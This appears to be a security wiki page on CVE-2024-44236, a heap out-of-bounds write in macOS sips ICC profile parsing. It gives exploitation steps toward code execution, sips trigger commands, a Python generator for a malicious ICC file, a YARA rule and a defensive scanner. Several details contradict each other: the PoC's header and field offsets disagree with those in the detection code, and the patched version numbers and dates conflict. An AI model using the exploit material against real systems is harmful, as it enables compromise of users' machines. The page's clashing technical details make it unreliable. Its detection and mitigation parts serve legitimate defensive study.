# WWW2Exec - sips ICC Profile Out-of-Bounds Write (CVE-2024-44236)
## Overview

A zero-write out-of-bounds vulnerability in the ICC profile parser of Apple macOS's Scriptable Image Processing System (`sips`) (macOS 15.0.1, `sips-307`) lets an attacker corrupt heap metadata and turn that primitive into full code execution. The bug lies in the handling of the `offsetToCLUT` field of `lutAToBType` (`mAB`) and `lutBToAType` (`mBA`) tags. If an attacker sets `offsetToCLUT == tagDataSize`, the parser zeroes 16 bytes past the end of the heap buffer. Heap spraying lets the attacker overwrite allocator structures or C++ pointers that are later dereferenced, yielding an arbitrary-write-to-exec chain (CVE-2024-44236, CVSS 7.8).

Apple fixed this bug in macOS Sonoma 15.2 / Ventura 14.7.1 (October 30, 2024). A second variant (CVE-2025-24185) was fixed in macOS 15.5 and iOS/iPadOS 18.5 on April 1, 2025.
## Vulnerable Code

```c
// Pseudocode extracted from sub_1000194D0 in sips-307 (macOS 15.0.1)
if (offsetToCLUT <= tagDataSize) {
    // BAD ➜ zero 16 bytes starting *at* offsetToCLUT
    for (uint32_t i = offsetToCLUT; i < offsetToCLUT + 16; i++)
        buffer[i] = 0; // no bounds check vs allocated size!
}
```
## Exploitation Steps

- Craft a malicious `.icc` profile
  - Write a minimal ICC header (`acsp`) and add a single `mAB` (or `mBA`) tag.
  - Set up the tag table so that `offsetToCLUT` equals the tag size (`tagDataSize`).
  - Place attacker-controlled data directly after the tag so that the 16 zero bytes overlap allocator metadata.
- Trigger parsing with any sips operation that touches the profile

```bash
# verification path (no output file required)
sips --verifyColor evil.icc
# or indirectly while converting images that embed the profile
sips -s format png payload.jpg --out out.png
```

- Heap metadata corruption ➜ arbitrary write ➜ ROP

In Apple's `nano_zone` allocator, the metadata for 16-byte slots sits directly after the 0x1000-aligned slab. By placing the profile tag at the end of such a slab, the 16 zero bytes corrupt `meta->slot_B`. On the next `free`, the corrupted pointer is inserted into the small free list, letting the attacker place a fake object at an arbitrary address and overwrite a C++ vtable pointer used by sips, ultimately hijacking execution to a ROP chain stored in the malicious ICC buffer.
## Quick PoC Generator (Python 3)

```python
#!/usr/bin/env python3
import struct, sys

HDR = b'acsp'.ljust(128, b'\0')  # ICC header (magic + padding)
TAGS = [(b'mAB ', 132, 52)]       # one tag directly after header

profile = HDR
profile += struct.pack('>I', len(TAGS))  # tag count
profile += b''.join(struct.pack('>4sII', *t) for t in TAGS)

mab = bytearray(52)                     # tag payload (52 bytes)
struct.pack_into('>I', mab, 44, 52)     # offsetToCLUT = size (OOB start)
profile += mab

open('evil.icc', 'wb').write(profile)
print('[+] Wrote evil.icc (%d bytes)' % len(profile))
```
## YARA detection rule

```yara
rule ICC_mAB_offsetToCLUT_anomaly
{
    meta:
        description = "Detect CLUT offset equal to tag length in mAB/mBA (CVE-2024-44236)"
        author = "HackTricks"
    strings:
        $magic = { 61 63 73 70 } // 'acsp'
    condition:
        // the ICC profile signature lives at bytes 36..39 of the 128-byte header
        $magic at 36 and
        // tag directory starts at 128 (4-byte count), entries are 12 bytes: sig, offset, size
        for any i in (0 .. 10) : (          // up to 10 tags
            // tag data begins with its type signature: 'mAB ' (0x6D414220) or 'mBA ' (0x6D424120)
            (uint32be(uint32be(132 + 12*i + 4)) == 0x6D414220 or
             uint32be(uint32be(132 + 12*i + 4)) == 0x6D424120) and
            // offsetToCLUT (bytes 24..27 of the tag data, big-endian) == tagDataSize
            uint32be(uint32be(132 + 12*i + 4) + 24) == uint32be(132 + 12*i + 8)
        )
}
```
## Impact

Opening or processing a crafted ICC profile results in remote arbitrary code execution in the context of the invoking user (Preview, QuickLook, Safari image rendering, Mail attachments, etc.), bypassing Gatekeeper because the profile can be embedded inside otherwise harmless images (PNG/JPEG/TIFF).
## Detection & Mitigation

- Patch! Make sure the host runs macOS ≥ 15.2 / 14.7.1 (or iOS/iPadOS ≥ 18.1).
- Deploy the YARA rule above on mail gateways and EDR solutions.
- Strip or sanitise embedded ICC profiles with `exiftool -icc_profile= -overwrite_original <file>` before any further processing of untrusted files.
- Harden Preview/QuickLook by running them inside sandboxed "transparency & modernisation" VMs when viewing unknown content.
- For DFIR, look in the unified log for recent executions of `sips --verifyColor` or loads of the `ColorSync` library by sandboxed applications.
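The YARA rule only catches the exact `offsetToCLUT == tagDataSize` case, while the vulnerable loop above clears 16 bytes from `offsetToCLUT` with nothing but an `offsetToCLUT <= tagDataSize` check, so any value in the last 15 bytes of the tag also runs past the buffer. The scanner below is an added example (not Apple's, HackTricks' or the ZDI's code) that walks an ICC profile's tag directory and flags every `mAB`/`mBA` tag for which `offsetToCLUT + 16 > tagDataSize`, i.e. the condition a patched parser has to reject. It follows the ICC specification layout: `acsp` at bytes 36..39 of the 128-byte header, a 4-byte tag count at 128, 12-byte directory entries, and `offsetToCLUT` at bytes 24..27 of the tag data. The `build_sample_profile` helper and the `A2B0` tag it emits are constructed test input, not a real profile.

```python
#!/usr/bin/env python3
"""Flag ICC mAB/mBA tags whose offsetToCLUT would let a 16-byte clear run past the tag.

Added example for this page (not sips, Apple or HackTricks code). Offsets follow the ICC
specification: 128-byte header with 'acsp' at 36..39, tag count at 128, 12-byte
directory entries (signature, offset, size), offsetToCLUT at bytes 24..27 of lut tags.
"""
import struct
import sys

HEADER_SIZE = 128
SIGNATURE_OFFSET = 36
CLUT_OFFSET_FIELD = 24        # position of offsetToCLUT inside an mAB/mBA tag
ZEROED_BYTES = 16             # the vulnerable loop clears 16 bytes starting at offsetToCLUT
LUT_TAG_TYPES = (b"mAB ", b"mBA ")


def parse_tag_table(profile: bytes):
    """Yield (tag_signature, data_offset, data_size) for every directory entry, bounds-checked."""
    if len(profile) < HEADER_SIZE + 4:
        raise ValueError("file shorter than an ICC header")
    if profile[SIGNATURE_OFFSET:SIGNATURE_OFFSET + 4] != b"acsp":
        raise ValueError("missing 'acsp' profile signature")
    (count,) = struct.unpack_from(">I", profile, HEADER_SIZE)
    if HEADER_SIZE + 4 + 12 * count > len(profile):
        raise ValueError("tag table runs past end of file")
    for i in range(count):
        sig, off, size = struct.unpack_from(">4sII", profile, HEADER_SIZE + 4 + 12 * i)
        if off + size > len(profile):
            raise ValueError(f"tag {sig!r} data runs past end of file")
        yield sig, off, size


def find_clut_anomalies(profile: bytes):
    """Return [(tag_signature, offsetToCLUT, tagDataSize)] for every suspicious lut tag.

    A safe parser must require offsetToCLUT + 16 <= tagDataSize; anything else is flagged,
    which covers the page's offsetToCLUT == tagDataSize case and the 15 values below it.
    """
    findings = []
    for sig, off, size in parse_tag_table(profile):
        if size < CLUT_OFFSET_FIELD + 4:
            continue                              # too short to hold the field at all
        if profile[off:off + 4] not in LUT_TAG_TYPES:
            continue                              # type signature is the first 4 bytes of tag data
        (offset_to_clut,) = struct.unpack_from(">I", profile, off + CLUT_OFFSET_FIELD)
        if offset_to_clut + ZEROED_BYTES > size:
            findings.append((sig, offset_to_clut, size))
    return findings


def build_sample_profile(offset_to_clut: int, tag_size: int = 52) -> bytes:
    """Constructed test input (not a real profile): one 'A2B0' tag of type lutAToBType."""
    header = bytearray(HEADER_SIZE)
    header[SIGNATURE_OFFSET:SIGNATURE_OFFSET + 4] = b"acsp"
    tag_data_offset = HEADER_SIZE + 4 + 12        # directly after a one-entry directory
    directory = struct.pack(">I", 1) + struct.pack(">4sII", b"A2B0", tag_data_offset, tag_size)
    tag = bytearray(tag_size)
    tag[0:4] = b"mAB "
    struct.pack_into(">I", tag, CLUT_OFFSET_FIELD, offset_to_clut)
    return bytes(header) + directory + bytes(tag)


if __name__ == "__main__":
    paths = sys.argv[1:]
    if not paths:
        # No files given: show the check on a constructed bad and a constructed benign profile.
        for label, clut in (("offsetToCLUT == tagDataSize", 52), ("in-bounds CLUT", 36)):
            print(f"{label}: {find_clut_anomalies(build_sample_profile(clut))}")
    for path in paths:
        with open(path, "rb") as fh:
            data = fh.read()
        try:
            hits = find_clut_anomalies(data)
        except ValueError as exc:
            print(f"{path}: not parseable as ICC ({exc})")
            continue
        for sig, clut, size in hits:
            print(f"{path}: tag {sig!r} offsetToCLUT={clut} tagDataSize={size} -> suspicious")
```

Run it with one or more `.icc` files (or images whose profile you have extracted with `exiftool`) as arguments; without arguments it prints the result for the two constructed profiles. Because it parses the directory instead of pattern-matching at fixed offsets, it does not depend on the `mAB` tag being the first entry.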
## References
- Trend Micro Zero Day Initiative advisory ZDI-24-1445 – “Apple macOS ICC Profile Parsing Out-of-Bounds Write Remote Code Execution (CVE-2024-44236)” https://www.zerodayinitiative.com/advisories/ZDI-24-1445/
- Apple security updates HT213981 “About the security content of macOS Sonoma 15.2” https://support.apple.com/en-us/HT213981